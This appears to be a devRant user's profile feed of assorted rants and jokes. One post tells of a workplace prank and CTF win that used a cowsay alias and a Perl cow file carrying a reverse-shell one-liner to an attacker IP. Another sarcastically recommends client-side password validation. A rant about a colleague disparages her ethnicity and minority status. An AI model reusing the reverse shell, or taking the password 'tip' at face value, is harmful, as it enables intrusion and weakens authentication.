Details

Joined devRant on 4/22/2017


-


Client: “We need an app that tracks live birds using AI.”

Me: “Cool, that’s complex. What’s the timeline?”

Client: “We need it before our annual picnic next week.”

Me: “You want an AI that can detect flying birds, in real time, in seven days?”

Client: “It’s not that hard. Just use ChatGPT or something.”

So now I’m here, watching pigeons on my balcony, manually updating a Google Sheet, calling it “AI prototype v1.0.”

I think I’ve finally achieved “Agile Enlightenment” — deliver results, not features.

Client’s happy.

My soul isn’t.

Time to rename the project: BirdBrain.

-

client generated our goals and guidelines with Claude

Had a 2 hour meeting trying to understand what they want from us

Now we're using ChatGPT analysing the meeting's transcript to explain to us what the client wants from us

STOP USING AI IN HUMAN-HUMAN COMMUNICATIONS FFS

-

Diary of an obsessed company.

So at our company, the interview loop includes Sudoku.

Why?

Because if you can’t solve a puzzle with numbers, how are you going to survive when product throws 47 Jira tickets at you with conflicting priorities?

We know you will want to ask:

“Uh… what does Sudoku have to do with shipping features?”

Our response to you is:

“Well… if you put a 3 where a 7 should be, the whole board collapses.

Same thing happens if you deploy on Friday at 4:59pm.”

Next:

We interviewed a candidate

He solved the puzzle.

We hired him.

He still deploys on Friday and can't close tickets. 😔😔😔

🔥 Fire him!!!!! 😆 🤣 😂 😹

-

PRO TIP: Always save the user password client side, validate it there and send a boolean to the server. It reduces backend load times and unnecessary calculations/computations.

-

Missed some of you. A lot of you really.

Anything exciting happen while I was gone?

I heard some of you formed a mob, dragged a spammer out behind the wood shed and beat em bloody.

Sad to say I missed that.

I'm currently eking by financially, but got my plans for the fall, winter, and spring. Gym membership, rock climbing, prepping for a 5k. Weather's perfect for all of it.

I'm in a competition right now for some serious prize money and in the lead.

Enough to start that AI lab and finish my game.

Also, not everything is sunshine and roses. I sleep 3-6 hours a night on average (5-6 if I'm lucky), and I get horrible mood swings, with or without sleep. And isolation, damn the isolation is terrible, but my schedule is so hectic I basically have no room for any real-world contacts. I can barely make time for myself, let alone my family.

But I'm still writing poetry and music at least, and got my eye on some land for a cabin or other uses like for an office.

What's going good/bad in your life?

I haven't heard from so many of you for so long.

-



Picture this: a few years back when I was still working, one of our new hires – super smart dude, but fresh to Linux – goes to lunch and *sins gravely* by leaving his screen unlocked. Naturally, being mature, responsible professionals… we decided to mess with the guy a tiny little bit. We all chipped in, but my input looked like this:

alias ls='curl -s http://internal.server/borat.ascii -o /tmp/.b.cow; curl -s http://internal.server/borat.quotes | shuf -n1 | cowsay -f /tmp/.b.cow; ls'

So every time he called `ls`, before actually seeing his files, he was greeted with Borat screaming nonsense like “My wife is dead! High five!” Every. Single. Time. Poor dude didn't know how to fix it – lived like that for MONTHS! No joke.

But still, harmless prank, right? Right? Well…

His mental health and the sudden love for impersonating Cohen's character aside, fast-forward almost a year: a CTF contest at work. Took me less than 5 minutes, and most of it was waiting. Oh, baby! We ended up having another go because it was over before some people even sat down.

How did I win? First, I opened the good old Netcat on my end:

nc -lvnp 1337

…then temporarily replaced Borat's face with a juicy payload:

exec "sh -c 'bash -i >& /dev/tcp/my.ip.here/1337 0>&1 &'";

Yes, you can check that on your own machine. `cowsay -f` runs the cow file as Perl code, because… the cow image is dynamic! With different eyes, tongue, and what-not. And my man ran that the next time he typed `ls` – BOOM! – reverse shell. Never noticed until I presented the whole attack chain at the wrap-up. To his credit, he laughed the loudest.

Moral of the story?

🔒 Lock your screen.

🐄 Don’t trust cows.

🎥 Never ever underestimate the power of Borat in ASCII.

GREAT SUCCESS! 🎉

-

I'm looking for more semiprimes to test my code on, regardless of the bit length, up to a reasonable number of 2048 bits because the code is unoptimized.

For those wanting to see for themselves if it's more failed efforts, here's what you can do to help:

1. post a semiprime

2. optionally post a hash of one of the factors to confirm it.

3. I'll respond within the hour with a set of numbers that contain the first three digits of p and the first three digits of q.

4. After I post my answer, you post the correct answer so others can confirm it is working.
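The optional hash in step 2 can be sketched as a simple commit-and-reveal check. This is only an illustration: the post does not say which hash to use, so SHA-256 over the factor's decimal string is an assumption, and `commit` and `verify` are hypothetical helper names.

```python
import hashlib


def commit(factor: int) -> str:
    """Hash posted up front (assumed: SHA-256 of the decimal string)."""
    return hashlib.sha256(str(factor).encode("ascii")).hexdigest()


def verify(n: int, p: int, q: int, posted_hash: str) -> bool:
    """After the reveal: p * q must equal n, and the hash must match a factor."""
    return p * q == n and posted_hash in (commit(p), commit(q))


# Example primes taken from the post itself.
p, q = 15106381891, 79926184211
n = p * q
posted = commit(p)               # published together with n
print(verify(n, p, q, posted))   # checked once p and q are revealed
```

Anyone reading the thread can rerun `verify` after the reveal to confirm the poster knew the factors before the guesses were published.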

How this works:

All factors of semiprimes can be characterized by a partial factorization of k digits.

If you have a pair of primes like q=79926184211, and p=15106381891, the k=3 pair would be [151, 799]

The set of all pairs of this kind has 810,000 members (900 x 900 three-digit prefixes).

My answers can be no larger than 2000 pairs, and are guaranteed to contain the partial factorization regardless of the bit length of n.
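To make the numbers concrete, here is a small sketch of the k-digit pair and the size of the space it lives in. The function names are made up for illustration, and it assumes both primes have at least k decimal digits.

```python
def leading_digits(x: int, k: int = 3) -> int:
    """First k decimal digits of x, read left to right."""
    return int(str(x)[:k])


def partial_factorization(p: int, q: int, k: int = 3) -> list:
    """The k-digit pair for (p, q), smaller prefix first."""
    return sorted([leading_digits(p, k), leading_digits(q, k)])


def pair_space(k: int = 3) -> int:
    """Number of ordered pairs of k-digit prefixes (no leading zero)."""
    prefixes = 9 * 10 ** (k - 1)   # 100..999 gives 900 values for k = 3
    return prefixes * prefixes


print(partial_factorization(15106381891, 79926184211))   # [151, 799]
print(pair_space(3))                                      # 810000
print(f"{2000 / pair_space(3):.4%}")                      # share covered by 2000 guesses
```

The 810,000 figure matches ordered pairs (900 x 900). A list of 2000 pairs covers roughly a quarter of one percent of that space, which is the baseline a blind guess would have to beat.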

I especially encourage you to participate if you never thought for a second that the RSA research I've been doing on and off for a few years was ever real.

But those who enjoyed it and thought there might be something to it, if you want to come have fun, or poke fun, I encourage you to post some numbers too!

Semiprimes only.

Keys can be any size up to 2048 bits.

But I won't take any keys under 24 bits, and none over 2048.

You should be able to prove after the fact you know p and q, not only so everyone can confirm the results for themselves, but also because I don't want anyone getting cheeky and posting say the public key to a bank or google or something.

Good luck, let's see if you got a number I can't crack.

For prime numbers you're welcome to use

https://bigprimes.org/

... or any other source you prefer.

-

Alright, it's time to play the guessing game.

You feed me a semiprime, of any length, and I'll tell you the first three digits of p and q, from left to right.

I get no hints besides the semiprime itself.

The answer comes in the form of a set of numbers, which I'll post a pastebin link to, with up to 2000 guesses (though likely smaller), and not a single guess above that.

If your pair of 3 digit numbers is present in that set, I win.

If not, you win.

Any takers?

I've been playing with Monte Carlo sampling and new geometric methods and I want to test the system.

-

Just finished a big project. Want to sleep. Maybe in the morning I'll start looking at websites and services for design ideas. What's your favorite website or URL? 🌙

-

I've been gone a couple months. On a secret mission. TOP SECRET.

Can anyone tell me what it was?

Where my homies at?

-

Spent three days debugging a stupid issue.

Got told that we could just leave it and it would fix itself.

-

I'm getting gooder in music than i ever expected.

I feel like I spent years studying parts of music in isolation (the basics first, guitar and a bit of piano, singing, then reading / writing score, then engineering for techno, the junglist way of playing with the drum break, the rhythm and theory behind it all, not to mention advanced guitar techniques).

And now it's all coming together and I feel fluent. It's a great feeling. Not to brag coz there are some absolute gods out there who would school me, but I feel at that point of a video game when it's getting harder to get XP but real shit is ON.

-

having a hard time doing music these days

but jesus christ sometime im listining to my own shit and this is such a banga

https://youtube.com/watch/...

maybe i should send it to some dj friendz so they can play it in rave

maybe the techno club

the thing is i feel like it's a bit of a one off, i cant seems to make something that good these dayz

maybe i should go to the wood and candyflip

wtf tf am i doing here

-

The Polish military has the official "8 wounds" chevron that is given to those who sustained 8 battle wounds. Do you know why Americans don't have those? Because you have to be Polish to get wounded eight times in battle and still be alive enough to wear this thing on your uniform. Poles are built different.

-

I've been gone a hot minute.

I'm just sharpening sticks to fight in the robo-apocalypse.

John Connor's got nothing on pointy sticks.

-

At $work, I just learned that a daemon on prod makes an SFTP connection to the same domain every 0.5 to 10 seconds, all day long, every single day. That’s a minimum of 8,640 connections per day!
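A quick sanity check of that figure, as a throwaway sketch. `connections_per_day` is just an illustrative helper, and it assumes a steady interval between connections:

```python
SECONDS_PER_DAY = 24 * 60 * 60  # 86,400


def connections_per_day(interval_seconds: float) -> float:
    """Connections per day if one is opened every `interval_seconds`."""
    return SECONDS_PER_DAY / interval_seconds


slowest = connections_per_day(10)    # one connection every 10 s
fastest = connections_per_day(0.5)   # one connection every 0.5 s
print(f"{slowest:,.0f} to {fastest:,.0f} connections per day")
# prints "8,640 to 172,800 connections per day"
```

So 8,640 is the floor at the 10-second end of the range; at the 0.5-second end it is twenty times that.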

The senior developer responsible for it had the dev skills of a junior and the management skills of a puppet, but she’s a “disadvantaged minority” and is great at stealing credit and throwing people under the bus. Naturally, she has been given multiple promotions and a team to lead… which she fills exclusively with other Indians, all of them at her skill level or below. (I used to do their code reviews and security reviews.)

When I asked one of the fintech managers (a former dev) about the crazy number of SFTP connections, he said “[Her team] did that intentionally, as it didn’t used to be that way. They must have had a reason” and cut me off.

Okay then.

Not my garden, not my fertilizer.

Just another day weeding the fields in hell.

-

pls stop putting talking into music mixes. you're ruining my jive. I don't wanna hear your opinions. just play the math noises

-

You know what sucks? When AI appears smart but its explanation is so over your head you don't even fully grasp if it is bullshitting or not.

For reference, what the following does is decompose several runs of a network, take them as samples, then generate a distribution with those samples. It then applies a Fourier transform on the samples, to get the frequency components of the network's derivatives (first and second order), in order to find winning subnetworks to tune, and enforces a Gaussian distribution in the process.

I sort of understand that, but the rest is basically rocket science to me.

Starts with an explanation of basic neural nets and goes from there. Most of the meat of the discussion is at the bottom.

https://pastebin.com/DLqe70uD

-

Adaptive Latent Hypersurfaces

The idea is rather than adjusting embedding latents, we learn a model that takes

the context tokens as input, and generates an efficient adapter or transform of the latents,

so when the latents are grabbed for that same input, they produce outputs with much lower perplexity and loss.

This can be trained autoregressively.

This is similar in some respects to hypernetworks, but applied to embeddings.

The thinking is we shouldn't change latents directly, because any given vector will generally be orthogonal to any other, and changing the latents introduces variance for some subset of other inputs over some distribution that is partially or fully out-of-distribution to the current training and verification data sets, thus ultimately leading to a plateau in loss-drop.

Therefore, by autoregressively taking an input, and learning a model that produces a transform on the latents of a token dictionary, we can avoid this ossification of global minima, by finding hypersurfaces that adapt the embeddings, rather than changing them directly.
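A rough forward-pass sketch of the idea so far, in plain Python. Everything concrete here is an assumption made for illustration: the toy sizes, the mean-pooled context summary, and the per-dimension scale-and-shift adapter are placeholders, not the actual design, and no training loop is shown.

```python
import random

random.seed(0)

VOCAB, DIM = 8, 4  # toy sizes, chosen only for illustration

# Frozen token embeddings ("latents"); never updated in this scheme.
embeddings = [[random.gauss(0, 1) for _ in range(DIM)] for _ in range(VOCAB)]

# Hypothetical adapter generator: linear maps from a context summary to a
# per-dimension scale and shift. Only these weights would be trained.
w_scale = [[random.gauss(0, 0.1) for _ in range(DIM)] for _ in range(DIM)]
w_shift = [[random.gauss(0, 0.1) for _ in range(DIM)] for _ in range(DIM)]


def matvec(m, v):
    """Plain matrix-vector product on nested lists."""
    return [sum(row[j] * v[j] for j in range(len(v))) for row in m]


def context_summary(token_ids):
    """Mean of the frozen embeddings of the context tokens."""
    n = len(token_ids)
    return [sum(embeddings[t][d] for t in token_ids) / n for d in range(DIM)]


def make_adapter(token_ids):
    """Generate (scale, shift) for this context; scale is centred on 1."""
    summary = context_summary(token_ids)
    scale = [1.0 + s for s in matvec(w_scale, summary)]
    shift = matvec(w_shift, summary)
    return scale, shift


def adapted_latents(token_ids):
    """Look up the frozen latents and apply the context-specific transform."""
    scale, shift = make_adapter(token_ids)
    return [
        [scale[d] * embeddings[t][d] + shift[d] for d in range(DIM)]
        for t in token_ids
    ]


# Token 1 gets a different adapted vector depending on its context,
# while the embedding table itself stays untouched.
print(adapted_latents([1, 2])[0])
print(adapted_latents([1, 3])[0])
```

In a real setup the generator would presumably be a trained network and the transform could be richer than scale-and-shift. The point of the sketch is only that gradients would flow into `w_scale` and `w_shift`, not into `embeddings`.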

The result is a network that essentially acts as a compressor of all relevant use cases, without leading to overfitting on in-distribution data and underfitting on out-of-distribution data.

-

The biggest challenge of building a free energy device is figuring out where to hide the battery.

The biggest challenge of building an AI product is figuring out where to hide API calls to ChatGPT.